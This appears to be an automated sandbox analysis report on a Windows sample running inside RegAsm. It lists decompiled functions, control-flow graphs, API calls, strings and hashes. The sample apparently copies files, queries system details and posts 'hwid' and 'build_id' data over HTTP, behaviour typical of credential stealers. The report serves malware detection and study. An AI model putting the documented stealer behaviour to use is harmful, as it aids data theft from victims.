                                                    Function 00408741 Relevance: 32.0, APIs: 21, Instructions: 471stringmemoryfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2933 408741-40875d call 4118f6 2936 40876e-408781 call 4118f6 2933->2936 2937 40875f-40876c call 411715 2933->2937 2943 408792-4087a5 call 4118f6 2936->2943 2944 408783-408790 call 411715 2936->2944 2942 4087cc-408867 call 411668 call 412d64 call 41185b call 4117e0 call 41185b call 4117e0 call 41177a call 411701 * 5 2937->2942 2982 40886c-40886f 2942->2982 2943->2942 2951 4087a7-4087c7 call 411701 * 3 call 40131a 2943->2951 2944->2942 2970 408dd8-408dd9 2951->2970 2983 408871-40888d call 41193a * 2 CopyFileA 2982->2983 2984 4088ab-4088bf call 411668 2982->2984 2996 4088a7 2983->2996 2997 40888f-4088a9 call 4116b4 call 4135b9 2983->2997 2989 4088c5-408966 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 2984->2989 2990 40896b-408a4c call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41185b call 41177a call 411701 * 2 2984->2990 3049 408a51-408a68 call 41193a 2989->3049 2990->3049 2996->2984 2997->2982 3057 408d89-408d9b call 41193a DeleteFileA call 4118d5 3049->3057 3058 408a6e-408a8a 3049->3058 3070 408da0-408dd3 call 4118d5 call 411701 * 5 call 40131a 3057->3070 3065 408a90-408aa4 GetProcessHeap RtlAllocateHeap 3058->3065 3066 408d75-408d88 3058->3066 3069 408aa7-408ab4 3065->3069 3066->3057 3077 408d11-408d1d lstrlenA 3069->3077 3078 408aba-408b50 call 411668 * 6 call 4118f6 3069->3078 3070->2970 3080 408d65-408d72 memset 3077->3080 3081 408d1f-408d4f lstrlenA call 4116b4 call 40134c call 418db9 3077->3081 3118 408b62-408b6b call 411715 3078->3118 3119 408b52-408b60 call 411715 3078->3119 3080->3066 3096 408d54-408d60 call 411701 3081->3096 3096->3080 3123 408b70-408b82 call 4118f6 3118->3123 3119->3123 3126 408b94-408b9d call 411715 3123->3126 3127 408b84-408b92 call 411715 3123->3127 3130 408ba2-408bb2 call 411927 3126->3130 3127->3130 3134 408bc1-408d0c call 41193a lstrcatA * 2 call 41193a lstrcatA * 2 call 41193a lstrcatA * 2 call 41193a lstrcatA * 2 call 41193a lstrcatA * 2 call 41193a lstrcatA * 2 call 408093 call 41193a lstrcatA call 411701 lstrcatA call 411701 * 6 3130->3134 3135 408bb4-408bbc call 411715 3130->3135 3134->3069 3135->3134
                                                    APIs
                                                      • Part of subcall function 004118F6: StrCmpCA.SHLWAPI(?,?), ref: 00411913
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408A97
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00408A9E
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,004251E8,?,00000000,00425200), ref: 00408885
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                    • lstrcatA.KERNEL32(?,00000000,00000000,00428E58,00428E58,00000000), ref: 00408BCD
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408BDB
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408BED
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408BFB
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C0D
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408C1B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C2D
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408C3B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C4D
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408C5B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C6D
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408C7B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408CBD
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 00408CD6
                                                    • lstrlenA.KERNEL32(?), ref: 00408D14
                                                    • lstrlenA.KERNEL32(?), ref: 00408D22
                                                    • memset.MSVCRT ref: 00408D6D
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • DeleteFileA.KERNEL32(00000000), ref: 00408D92
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemset
                                                    • String ID:
                                                    • API String ID: 1498849721-0
                                                    • Opcode ID: 9e96b593e49dfbaf82baf5f3f7b14edd2bd44551348f714d62c2555fbf218532
                                                    • Instruction ID: 75b67620860664da6d1f04eed94d7d10b36c4f27a8908ca0f5e9c5d632b00ffa
                                                    • Opcode Fuzzy Hash: 9e96b593e49dfbaf82baf5f3f7b14edd2bd44551348f714d62c2555fbf218532
                                                    • Instruction Fuzzy Hash: 02021D71900109AADB05FBA1ED56EEE7779EF11309F50406AF216B10F1EF395A88CB68
                                                    Function 0042095B Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 617COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3169 42095b-420975 3170 420981-42098d 3169->3170 3171 420977-42097c 3169->3171 3172 420999-4209a9 3170->3172 3173 42098f-420994 3170->3173 3174 4213c9-4213cb 3171->3174 3175 4209bb-4209d4 lstrcpyA 3172->3175 3176 4209ab-4209af 3172->3176 3173->3174 3178 4209e0-4209e6 3175->3178 3179 4209d6-4209db 3175->3179 3176->3175 3177 4209b1 3176->3177 3177->3175 3180 4209ec-4209f7 3178->3180 3179->3174 3181 4209f9-420a05 3180->3181 3182 420a1f-420a31 3180->3182 3183 420a10-420a1d 3181->3183 3184 420a07-420a0d 3181->3184 3185 420a33-420a4b strlen 3182->3185 3186 420a59 3182->3186 3183->3180 3184->3183 3185->3186 3187 420a4d-420a57 3185->3187 3188 420a60-420a76 3186->3188 3187->3188 3189 420a78-420a8a call 41f930 3188->3189 3190 420a8c 3188->3190 3189->3190 3192 420a90-420a94 3189->3192 3190->3192 3194 420a96-420aa7 call 4201a9 3192->3194 3195 420aa9-420aad 3192->3195 3205 420b01-420b05 3194->3205 3197 420ac5-420ac9 3195->3197 3198 420aaf-420ac3 call 420255 3195->3198 3201 420ae1-420ae5 3197->3201 3202 420acb-420adf call 4203dd 3197->3202 3198->3205 3203 420af7-420afc 3201->3203 3204 420ae7-420af5 call 4204e9 3201->3204 3202->3205 3203->3174 3204->3205 3209 420b07-420b0a 3205->3209 3210 420b0f-420b55 lstrcpyA * 2 lstrlenA 3205->3210 3209->3174 3213 420b76-420c0b lstrcpyA 3210->3213 3214 420b57-420b70 lstrcatA 3210->3214 3215 420c1f-420c3c 3213->3215 3216 420c0d-420c13 3213->3216 3214->3213 3218 420c61 3215->3218 3219 420c3e-420c48 3215->3219 3216->3215 3217 420c15-420c18 3216->3217 3217->3215 3220 420c68-420e54 call 421b40 * 9 memcpy call 41e919 3218->3220 3219->3218 3221 420c4a-420c5f 3219->3221 3242 420e56-420e66 call 42070a 3220->3242 3243 420e6b-420e97 3220->3243 3221->3220 3242->3174 3245 420eb2-420ee7 3243->3245 3246 420e99-420ead call 42070a 3243->3246 3249 420ef6-420efd 3245->3249 3246->3174 3251 420f29-420f32 3249->3251 3252 420eff-420f0a 3249->3252 3254 420f34-420f4a GetTickCount GetDesktopWindow srand 3251->3254 3255 420f4b-420f52 3251->3255 3252->3251 3253 420f0c-420f27 call 41f864 3252->3253 3253->3249 3254->3255 3257 420f61-420f68 3255->3257 3259 420f83-420f9b 3257->3259 3260 420f6a-420f81 rand 3257->3260 3263 420faa-420fb1 3259->3263 3260->3257 3264 420fb3-420fda call 41f907 3263->3264 3265 420fdc-420fe5 3263->3265 3264->3263 3266 420fe7-420fed 3265->3266 3267 421018-421025 3265->3267 3266->3267 3269 420fef-421015 call 41ff44 3266->3269 3270 421027-42102d 3267->3270 3271 42103b 3267->3271 3269->3267 3270->3271 3274 42102f-421039 3270->3274 3275 421042-421057 3271->3275 3274->3275 3278 421076-42107c 3275->3278 3279 421059-42105d 3275->3279 3281 421094-42109a 3278->3281 3282 42107e-421082 3278->3282 3279->3278 3280 42105f-42106c call 420788 3279->3280 3289 421071-421074 3280->3289 3283 4210a9-4210e6 call 42070a 3281->3283 3284 42109c-4210a2 3281->3284 3282->3281 3286 421084-421092 call 4208e6 3282->3286 3292 4210f6-4210fa 3283->3292 3293 4210e8-4210f1 3283->3293 3284->3283 3286->3283 3289->3283 3294 421106-42116b 3292->3294 3295 4210fc-421101 3292->3295 3293->3174 3296 421171-42117a 3294->3296 3297 421247-421254 3294->3297 3295->3174 3298 421188-42119d 3296->3298 3299 42117c-421182 3296->3299 3300 421260-421264 3297->3300 3301 421256-42125b 3297->3301 3302 4211b0-4211de call 4200c8 3298->3302 3303 42119f-4211a9 3298->3303 3299->3297 3299->3298 3304 421266-42126f 3300->3304 3305 42127b-4212a2 call 41ecec 3300->3305 3301->3174 3311 4211e0-4211e5 3302->3311 3312 4211ea-421211 call 41e919 3302->3312 3303->3302 3304->3305 3307 421271-421276 3304->3307 3313 4212a4-4212a9 3305->3313 3314 4212ae-4212ca 3305->3314 3307->3174 3311->3174 3320 421213-421218 3312->3320 3321 42121d-421236 call 4200c8 3312->3321 3313->3174 3316 4212d1-4212db 3314->3316 3318 4212eb-421334 call 412b6b memcpy call 412b6b 3316->3318 3319 4212dd-4212e6 3316->3319 3329 421339-421370 memcpy 3318->3329 3319->3174 3320->3174 3327 421242 3321->3327 3328 421238-42123d 3321->3328 3327->3316 3328->3174 3330 421372-421381 3329->3330 3331 421383-42138c 3329->3331 3332 4213c7 3330->3332 3333 421392-42139f 3331->3333 3332->3174 3334 4213a1-4213b3 3333->3334 3335 4213b5-4213c1 3333->3335 3334->3333 3335->3332
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: T$U
                                                    • API String ID: 0-2115836835
                                                    • Opcode ID: 10f69da23589928bea78b6bdb87915afbf723c228a04615c940d6145975852ec
                                                    • Instruction ID: 4e7ab3bbaac243ee1ce136935939dafd3e3fd9ddb02e4ea4b8407d5d40478ec4
                                                    • Opcode Fuzzy Hash: 10f69da23589928bea78b6bdb87915afbf723c228a04615c940d6145975852ec
                                                    • Instruction Fuzzy Hash: 626218B4A042A9CFDB20CF54D884BE9B7B4AF14305F5440DBEA09A7252D7389E89CF59
                                                    Function 004043FA Relevance: 28.5, APIs: 12, Strings: 4, Instructions: 451networkstringfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3336 4043fa-4044ba call 4116b4 call 40430f call 411668 * 5 call 41193a InternetOpenA StrCmpCA 3353 4044c3-4044c7 3336->3353 3354 4044bc 3336->3354 3355 404a55-404ad4 InternetCloseHandle call 412bcb * 2 call 4116b4 call 411701 * 9 3353->3355 3356 4044cd-40463f call 412d64 call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 4117e0 call 41177a call 411701 * 2 InternetConnectA 3353->3356 3354->3353 3356->3355 3431 404645-404649 3356->3431 3432 404657 3431->3432 3433 40464b-404655 3431->3433 3434 404661-40468f HttpOpenRequestA 3432->3434 3433->3434 3435 404695-404699 3434->3435 3436 404a49-404a4f InternetCloseHandle 3434->3436 3437 4046c0-4049b8 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 411668 call 4117e0 * 2 call 41177a call 411701 * 2 call 41193a lstrlenA call 41193a * 2 lstrlenA call 41193a HttpSendRequestA 3435->3437 3438 40469b-4046ba InternetSetOptionA 3435->3438 3436->3355 3549 4049bf-4049e8 InternetReadFile 3437->3549 3438->3437 3550 4049f3-404a44 InternetCloseHandle call 411701 3549->3550 3551 4049ea-4049f1 3549->3551 3550->3436 3551->3550 3552 4049f5-404a33 call 41185b call 41177a call 411701 3551->3552 3552->3549
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404492
                                                    • StrCmpCA.SHLWAPI(?), ref: 004044B2
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040462C
                                                    • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00404682
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004046BA
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00425200,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040497C
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404998
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004049AB
                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004049D5
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A38
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A4F
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                    • String ID: "$------$build_id$hwid
                                                    • API String ID: 3006978581-50533134
                                                    • Opcode ID: cceb3a196459d883b403675918582489495ab2fed22875715751cb834377af79
                                                    • Instruction ID: 067cb1f7702ceabbac9578a1173a021fc80b9e748851ef74f8b32e742b117f95
                                                    • Opcode Fuzzy Hash: cceb3a196459d883b403675918582489495ab2fed22875715751cb834377af79
                                                    • Instruction Fuzzy Hash: 22124E71900218AADB15EBA1DD92FDEB379BF15305F5000AAF216B21E1DF386B88CF54
                                                    Function 004127AF Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 172memorycomtimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000,?,00428FE4), ref: 004127D9
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00428E48,00000000,?), ref: 004127F1
                                                    • CoCreateInstance.OLE32(0042AE78,00000000,00000001,0042ADA8,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ), ref: 0041280D
                                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,00428E48,00000000,?,00000000), ref: 00412855
                                                    • VariantInit.OLEAUT32(?), ref: 004128C1
                                                    • FileTimeToSystemTime.KERNEL32(?,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000), ref: 004128FA
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000), ref: 00412907
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000), ref: 0041290E
                                                    • wsprintfA.USER32 ref: 0041293D
                                                    • VariantClear.OLEAUT32(?), ref: 00412955
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: HeapInitializeTimeVariant$AllocBlanketClearCreateFileInitInstanceProcessProxySecuritySystemwsprintf
                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
                                                    • API String ID: 1977436990-271508173
                                                    • Opcode ID: ba33cfd2da918b761e9130eb7da6f96fb9872cbbfcfe80a5cabb4ca5af105773
                                                    • Instruction ID: b87b7ae96d8d1a7714e06012ec36ed585f0f60198b44980e8310200412a3d949
                                                    • Opcode Fuzzy Hash: ba33cfd2da918b761e9130eb7da6f96fb9872cbbfcfe80a5cabb4ca5af105773
                                                    • Instruction Fuzzy Hash: B561F671A40218BFDB10DB94DD46FEDBBB8BB08B11F604116F611FA1D0C7B8A991CB69
                                                    Function 00404239 Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 73memorystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • Ici Radio-Canada Tl (stylized as ICI Radio-Canada Tl, and sometimes abbreviated as Ici Tl) is a Canadian French-language fre, xrefs: 0040428E, 004042FE
                                                    • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 004042C5
                                                    • Niedert is an Ortsgemeinde , xrefs: 00404283, 004042F3
                                                    • Organ perforation is a complete penetration of the wall of a hollow organ in the body, such as the gastrointestinal tract in the c, xrefs: 00404278, 004042E8
                                                    • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 004042D0
                                                    • Chrysorabdia bivitta is a moth of the subfamily Arctiinae first described by Francis Walker in 1856., xrefs: 0040426D, 004042DD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: wcslen$AllocLocalstrlen
